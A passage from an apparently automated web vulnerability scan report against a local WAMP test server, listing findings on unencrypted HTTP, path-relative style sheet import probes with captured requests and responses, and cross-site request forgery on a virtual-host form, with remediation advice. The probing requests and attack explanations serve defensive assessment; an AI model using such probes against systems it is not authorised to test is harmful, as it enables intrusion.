Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Location: config.txt
Vary: negotiate
TCN: choice
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "1bdd6-574048ecc5400;578846343188a"
Accept-Ranges: bytes
Content-Length: 114134
Connection: close
Content-Type: text/plain

.. index:: config.inc.php

.. _config:

Configuration
=============

All configurable data is placed in :file:`config.inc.php` in phpMyAdmin's
toplevel directory. If this file does not exist, please
...[SNIP]...
xample-signon:

Example for signon authentication
+++++++++++++++++++++++++++++++++

This example uses :file:`examples/signon.php` to demonstrate usage of :ref:`auth_signon`:

.. code-block:: php

<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'signon';
$cfg['Servers'][$i]['SignonSession'] = 'SignonSession';
$cfg['Servers'][$i]['SignonURL'] = 'examples/signon.php';
?>
`

Example for IP address limited autologin
++++++++++++++++++++++++++++++++++++++++

If you want to automatically login when accessing phpMyAdmin locally while asking
for a password when accessing rem
...[SNIP]...
e MySQL servers
++++++++++++++++++++++++++++++++++++++++

You can configure any number of servers using :config:option:`$cfg['Servers']`,
following example shows two of them:

.. code-block:: php

<?php
$cfg['blowfish_secret']='multiServerExample70518';
//any string of your choice
$i = 0;

$i++; // server 1 :
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['verbose'] = 'no1';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
// more options for #1 ...

$i++; // server 2 :
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['verbose'] = 'no2';
$cfg['Servers'][$i]['host'] = 'remote.host.addr';//or ip:'10.9.8.1'
// this server must allow remote clients, e.g., host 10.9.8.%
// not only in mysql.host but also in the startup configuration
$cfg['Servers'][$i]['extension'] = 'mysqli';
// more options for #2 ...

// end of server sections
$cfg['ServerDefault'] = 0; // to choose the server on startup

// further general options ...
?>


.. _example-google-ssl:

Google Cloud SQL with SSL
+++++++++++++++++++++++++

To connect to Google Could SQL, you currently need to disable certificate
verification. This is caused by the certficate
...[SNIP]...

Request 2

GET /phpmyadmin/doc/html/_sources/config.txt HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "1bdd6-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 114134
Connection: close
Content-Type: text/plain

.. index:: config.inc.php

.. _config:

Configuration
=============

All configurable data is placed in :file:`config.inc.php` in phpMyAdmin's
toplevel directory. If this file does not exist, please
...[SNIP]...
xample-signon:

Example for signon authentication
+++++++++++++++++++++++++++++++++

This example uses :file:`examples/signon.php` to demonstrate usage of :ref:`auth_signon`:

.. code-block:: php

<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'signon';
$cfg['Servers'][$i]['SignonSession'] = 'SignonSession';
$cfg['Servers'][$i]['SignonURL'] = 'examples/signon.php';
?>
`

Example for IP address limited autologin
++++++++++++++++++++++++++++++++++++++++

If you want to automatically login when accessing phpMyAdmin locally while asking
for a password when accessing rem
...[SNIP]...
e MySQL servers
++++++++++++++++++++++++++++++++++++++++

You can configure any number of servers using :config:option:`$cfg['Servers']`,
following example shows two of them:

.. code-block:: php

<?php
$cfg['blowfish_secret']='multiServerExample70518';
//any string of your choice
$i = 0;

$i++; // server 1 :
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['verbose'] = 'no1';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
// more options for #1 ...

$i++; // server 2 :
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['verbose'] = 'no2';
$cfg['Servers'][$i]['host'] = 'remote.host.addr';//or ip:'10.9.8.1'
// this server must allow remote clients, e.g., host 10.9.8.%
// not only in mysql.host but also in the startup configuration
$cfg['Servers'][$i]['extension'] = 'mysqli';
// more options for #2 ...

// end of server sections
$cfg['ServerDefault'] = 0; // to choose the server on startup

// further general options ...
?>


.. _example-google-ssl:

Google Cloud SQL with SSL
+++++++++++++++++++++++++

To connect to Google Could SQL, you currently need to disable certificate
verification. This is caused by the certficate
...[SNIP]...

Request 3

GET /phpmyadmin/doc/html/_sources/faq.txt HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "16cbc-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 93372
Connection: close
Content-Type: text/plain

.. _faq:

FAQ - Frequently Asked Questions
================================

Please have a look at our `Link section
<https://www.phpmyadmin.net/docs/>`_ on the official
phpMyAdmin homepage for in-dep
...[SNIP]...
-------------------------------------------------------------

Edit your :file:`config.inc.php` file and ensure there is nothing (I.E. no
blank lines, no spaces, no characters...) neither before the ``<?php`` tag at
the beginning, neither after the ``?>
`` tag at the end.

.. _faq2_2:

2.2 phpMyAdmin can't connect to MySQL. What's wrong?
----------------------------------------------------

Either there is an error with your PHP setup or your username
...[SNIP]...
13. Unencrypted communications
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue description

The application allows users to connect to it over unencrypted connections. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the application and obtain any information the user supplies. Furthermore, an attacker able to modify traffic could use the application as a platform for attacks against its users and third-party websites. Unencrypted connections have been exploited by ISPs and governments to track users, and to inject adverts and malicious JavaScript. Due to these concerns, web browser vendors are planning to visually flag unencrypted connections as hazardous.

To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Please note that using a mixture of encrypted and unencrypted communications is an ineffective defense against active attackers, because they can easily remove references to encrypted resources when these references are transmitted over an unencrypted connection.

Issue remediation

Applications should use transport-level encryption (SSL/TLS) to protect all communications passing between the client and the server. The Strict-Transport-Security HTTP header should be used to ensure that clients refuse to access the server over an insecure connection.

References

Vulnerability classifications

14. Path-relative style sheet import
Previous  Next

There are 6 instances of this issue:

Issue background

Path-relative style sheet import vulnerabilities arise when the following conditions hold:

  1. A response contains a style sheet import that uses a path-relative URL (for example, the page at "/original-path/file.php" might import "styles/main.css").
  2. When handling requests, the application or platform tolerates superfluous path-like data following the original filename in the URL (for example, "/original-path/file.php/extra-junk/"). When superfluous data is added to the original URL, the application's response still contains a path-relative stylesheet import.
  3. The response in condition 2 can be made to render in a browser's quirks mode, either because it has a missing or old doctype directive, or because it allows itself to be framed by a page under an attacker's control.
  4. When a browser requests the style sheet that is imported in the response from the modified URL (using the URL "/original-path/file.php/extra-junk/styles/main.css"), the application returns something other than the CSS response that was supposed to be imported. Given the behavior described in condition 2, this will typically be the same response that was originally returned in condition 1.
  5. An attacker has a means of manipulating some text within the response in condition 4, for example because the application stores and displays some past input, or echoes some text within the current URL.

Given the above conditions, an attacker can execute CSS injection within the browser of the target user. The attacker can construct a URL that causes the victim's browser to import as CSS a different URL than normal, containing text that the attacker can manipulate.

Being able to inject arbitrary CSS into the victim's browser may enable various attacks, including:

Issue remediation

The root cause of the vulnerability can be resolved by not using path-relative URLs in style sheet imports. Aside from this, attacks can also be prevented by implementing all of the following defensive measures:

References

Vulnerability classifications



14.1. http://localhost/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://localhost
Path:   /

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):
  1. The original response contains a path-relative style sheet import (see response 1).
  2. When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
  3. Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
  4. When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.

Request 1

GET /?lang=czech HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5578
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER P..ehled</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width">
   <link id="stylecall" rel="stylesheet" href="wampthemes/classic/style.css" />
   <link rel="shortcut icon" href="index.php?img=favicon" type="image/ico" />
...[SNIP]...

Request 2

GET /index.php/irezts/?lang=czech HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5578
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER P..ehled</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width">
   <link id="stylecall" rel="stylesheet" href="wampthemes/classic/style.css" />
   <link rel="shortcut icon" href="index.php?img=favicon" type="image/ico" />
...[SNIP]...

Request 3

GET /index.php/irezts/wampthemes/classic/style.css HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5588
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER Homepage</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=de
...[SNIP]...
14.2. http://localhost/examplewebiste/
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /examplewebiste/

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The response contains a path-relative style sheet import, and so condition 1 for an exploitable vulnerability is present (see issue background). The response can also be made to render in a browser's quirks mode. The page does not contain a doctype directive, and so it will always be rendered in quirks mode. Further, the response does not prevent itself from being framed, so an attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.) This means that condition 3 for an exploitable vulnerability is probably present if condition 2 is present.

We were not able to confirm that the other conditions hold, and you should manually investigate this issue to confirm whether they do hold.

Request 1

GET /examplewebiste/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6721
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
14.3. http://localhost/examplewebiste/about
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://localhost
Path:   /examplewebiste/about

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):
  1. The original response contains a path-relative style sheet import (see response 1).
  2. When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
  3. Response 2 can be made to render in a browser's quirks mode. The page does not contain a doctype directive, and so it will always be rendered in quirks mode. Further, the response does not prevent itself from being framed, so an attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
  4. When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.

Request 1

GET /examplewebiste/about HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Location: about.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6204
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...

Request 2

GET /examplewebiste/about/ke8f0o/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:26 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4840
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...

Request 3

GET /examplewebiste/about/ke8f0o/examplewebiste/css/main.css HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4840
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
14.4. http://localhost/examplewebiste/instructions
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://localhost
Path:   /examplewebiste/instructions

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):
  1. The original response contains a path-relative style sheet import (see response 1).
  2. When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
  3. Response 2 can be made to render in a browser's quirks mode. The page does not contain a doctype directive, and so it will always be rendered in quirks mode. Further, the response does not prevent itself from being framed, so an attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
  4. When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.

Request 1

GET /examplewebiste/instructions HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Location: instructions.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 15378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...

Request 2

GET /examplewebiste/instructions/i6ybi8/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:07:12 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 14014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...

Request 3

GET /examplewebiste/instructions/i6ybi8/examplewebiste/css/main.css HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:07:13 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 14014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
14.5. http://localhost/examplewebiste/vulnerabilities/brute/
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The response contains a path-relative style sheet import, and so condition 1 for an exploitable vulnerability is present (see issue background). The response can also be made to render in a browser's quirks mode. The page does not contain a doctype directive, and so it will always be rendered in quirks mode. Further, the response does not prevent itself from being framed, so an attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.) This means that condition 3 for an exploitable vulnerability is probably present if condition 2 is present.

We were not able to confirm that the other conditions hold, and you should manually investigate this issue to confirm whether they do hold.

Request 1

GET /examplewebiste/vulnerabilities/brute/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4323
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="../../examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
14.6. http://localhost/phpsysinfo/index.php
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /phpsysinfo/index.php

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The response contains a path-relative style sheet import, and so condition 1 for an exploitable vulnerability is present (see issue background). The response can also be made to render in a browser's quirks mode. The page does not contain a doctype directive, and so it will always be rendered in quirks mode. Further, the response does not prevent itself from being framed, so an attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.) This means that condition 3 for an exploitable vulnerability is probably present if condition 2 is present.

We were not able to confirm that the other conditions hold, and you should manually investigate this issue to confirm whether they do hold.

Request 1

GET /phpsysinfo/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 1688
Connection: close
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<link rel="shortcut icon" href="gfx/favicon.gif" />
<link type="text/css" rel="stylesheet" href="./templates/phpsysinfo.css" />
<title>
...[SNIP]...
15. Cross-site request forgery
Previous  Next

There are 2 instances of this issue:

Issue background

Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application. For a request to be vulnerable to CSRF, the following conditions must hold:

Issue remediation

The most effective way to protect against CSRF vulnerabilities is to include within relevant requests an additional token that is not transmitted in a cookie: for example, a parameter in a hidden form field. This additional token should contain sufficient entropy, and be generated using a cryptographic random number generator, such that it is not feasible for an attacker to determine or predict the value of any token that was issued to another user. The token should be associated with the user's session, and the application should validate that the correct token is received before performing any action resulting from the request.

An alternative approach, which may be easier to implement, is to validate that Host and Referer headers in relevant requests are both present and contain the same domain name. However, this approach is somewhat less robust: historically, quirks in browsers and plugins have often enabled attackers to forge cross-domain requests that manipulate these headers to bypass such defenses.

References

Vulnerability classifications



15.1. http://localhost/add_vhost.php
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.

Request 1

POST /add_vhost.php?lang=english HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/add_vhost.php?lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
Cookie: PHPSESSID=9dflduvhvd2bl3t0818dfugmoh

vh_name=176621&vh_folder=711144&vh_ip=182032&checkadd=1934982712&submit=Start+the+creation+of+the+VirtualHost+%28May+take+a+while...%29

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4972
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="fr">
   <head>
       <title>Ajouter un "Virtual Host"</title>
       <meta charset="UTF-8">
       <style>
           * {
               margin: 0;
               padding: 0;
           }

           html {
               background:
...[SNIP]...

Request 2

